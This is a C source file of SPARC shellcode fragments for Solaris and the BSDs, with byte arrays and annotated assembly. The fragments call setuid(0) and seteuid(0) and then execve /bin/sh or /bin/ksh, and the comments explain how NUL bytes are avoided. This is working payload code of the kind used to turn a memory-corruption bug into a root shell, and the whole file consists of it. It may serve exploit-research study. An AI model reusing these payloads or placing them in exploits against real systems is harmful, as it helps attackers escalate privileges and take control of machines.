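/*
 * SPARC Shellcode fragments to set privs and exec a shell.
 * Runs on Solaris, NetBSD, OpenBSD, maybe others.
 *
 * -ghandi
 *
 * Layout notes for readers of this file:
 *  - Each array is a run of 4-byte big-endian SPARC instructions, with the
 *    assembly for every word written alongside it.  The string literal adds
 *    a trailing NUL, so sizeof(fragment) - 1 is the instruction byte count.
 *  - None of the fragments contains a 0x00 byte; zero operands are produced
 *    with "xor %sp, %sp, %rd" (a register xor'd with itself) rather than a
 *    literal 0.
 *  - The syscall number is loaded into %g1 and the trap is "ta 0x8".  The
 *    numbers are the ones the original author chose for the targets listed
 *    above and are OS-specific.
 *  - The "#ifdef BSD" in seteuid_code is closed with "#endif" below; the
 *    original text left it unterminated, which is a preprocessor error.
 */

/*
 * Four-byte filler used as a NOP-equivalent.  It appears to decode to
 * "sub %l2, 5, %g1" (TODO confirm); %g1 is reloaded by the "mov" before
 * every trap in the fragments below, so the write has no lasting effect.
 */
char nop[] = "\x82\x24\xa0\x05";

/*
 * Call setuid(0);
 */
char setuid_code[] =
    "\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0   -- %o0 = 0 */
    "\x82\x10\x20\x17" /* mov 23, %g1 */
    "\x91\xd0\x20\x08" /* ta 0x8 */
    ;

/*
 * Call seteuid(0);
 *
 * Only the syscall number differs between the BSD and non-BSD builds; the
 * trap instruction is shared, so the conditional must end before it.
 */
char seteuid_code[] =
    "\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0   -- %o0 = 0 */
#ifdef BSD
    "\x82\x10\x20\xb7" /* mov 183, %g1 */
#else
    "\x82\x10\x20\x8d" /* mov 141, %g1 */
#endif /* BSD */
    "\x91\xd0\x20\x08" /* ta 0x8 */
    ;

/*
 * Call execve("/bin/ksh", {"/bin/ksh", NULL}, NULL);
 *
 * The path is built in %l0/%l1 as two 32-bit words ("/bin" and "/ksh") and
 * stored below %sp with "std" (which writes the %l0:%l1 register pair),
 * followed by a zero word from %g0 as the string terminator.  The argv
 * array {path, NULL} is then stored from the %o0:%o1 pair.
 */
char execve_binksh[] =
    "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */
    "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 ! 0x2f62696e */
    "\x23\x0b\xda\xdc" /* sethi %hi(0x2f6b7000), %l1 */
    "\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 ! 0x2f6b7368 */
    "\xe0\x3b\xbf\xe8" /* std %l0, [%sp - 24] */
    "\xc0\x23\xbf\xf0" /* st %g0, [%sp - 16]  -- NUL terminator */
    "\x90\x23\xa0\x18" /* sub %sp, 24, %o0    -- path pointer */
    "\x92\x1b\x80\x0e" /* xor %sp, %sp, %o1   -- %o1 = 0 */
    "\xd0\x3b\xbf\xf8" /* std %o0, [%sp - 8]  -- {path, NULL} */
    "\x92\x23\xa0\x08" /* sub %sp, 8, %o1     -- argv pointer */
    "\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2   -- envp = 0 */
    "\x82\x10\x20\x3b" /* mov 59, %g1 */
    "\x91\xd0\x20\x08" /* ta 0x8 */
    ;

/*
 * Call execve("/bin/sh", {"/bin/sh", NULL}, NULL);
 *
 * Same construction as execve_binksh, but "/sh\0" fits in a single sethi
 * (its low 10 bits are already zero), so no "or" into %l1 and no separate
 * terminator store are needed.
 */
char execve_binsh[] =
    "\x21\x0b\xd8\x9a" /* sethi 0x2f626800, %l0 */
    "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 ! 0x2f62696e */
    "\x23\x0b\xdc\xda" /* sethi 0x2f736800, %l1 */
    "\xe0\x3b\xbf\xf0" /* std %l0, [%sp - 16] */
    "\x90\x23\xa0\x10" /* sub %sp, 16, %o0    -- path pointer */
    "\x92\x1b\x80\x0e" /* xor %sp, %sp, %o1   -- %o1 = 0 */
    "\xd0\x3b\xbf\xf8" /* std %o0, [%sp - 8]  -- {path, NULL} */
    "\x92\x23\xa0\x08" /* sub %sp, 8, %o1     -- argv pointer */
    "\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2   -- envp = 0 */
    "\x82\x10\x20\x3b" /* mov 59, %g1 */
    "\x91\xd0\x20\x08" /* ta 0x8 */
    ;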